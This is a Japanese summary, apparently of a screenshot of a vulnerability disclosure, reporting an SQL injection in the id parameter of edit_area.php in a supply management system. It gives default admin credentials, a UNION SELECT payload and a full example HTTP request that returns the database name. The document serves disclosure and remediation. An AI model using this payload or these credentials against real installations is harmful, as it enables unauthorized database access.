このウェブページのスクリーンショットから、脆弱性に関する以下の主要な情報を取得できます: 1. 脆弱性の種類:SQLインジェクション(SQLi-2.md) 2. 脆弱性の説明:ベンダー管理システムのv1.0版にSQLインジェクション脆弱性が存在する。 3. 脆弱性の報告者:武漢大学の姚炜柏 4. バックエンドのログインアカウントとパスワード:admin/admin123 5. 脆弱性ファイル:/Supply_Management_System/admin/edit_area.php?id= 6. 脆弱性の位置:/Supply_Management_System/admin/edit_area.php の id パラメータ 7. 現在のデータベース名:sourcecodester_scm_new 8. ペイロード:/Supply_Management_System/admin/edit_area.php?id=-1%27%20union%20select%2001,database(),3-- // 漏洩箇所 --> id 9. 脆弱性利用の例: - リクエストURL:/Supply_Management_System/admin/edit_area.php?id=-1%27%20union%20select%2001,database(),3-- + // HT - リクエストヘッダ: - Host: 192.168.1.88 - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 - Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - DNT: 1 - Cookie: PHPSESSID=krbgs900f1q659nctcebpvlsa8 - Connection: close - リクエスト結果: - データベース名を返す:sourcecodester_scm_new これらの情報は、開発者が脆弱性の具体的な状況を理解し、対応策を講じて脆弱性を修正するために役立ちます。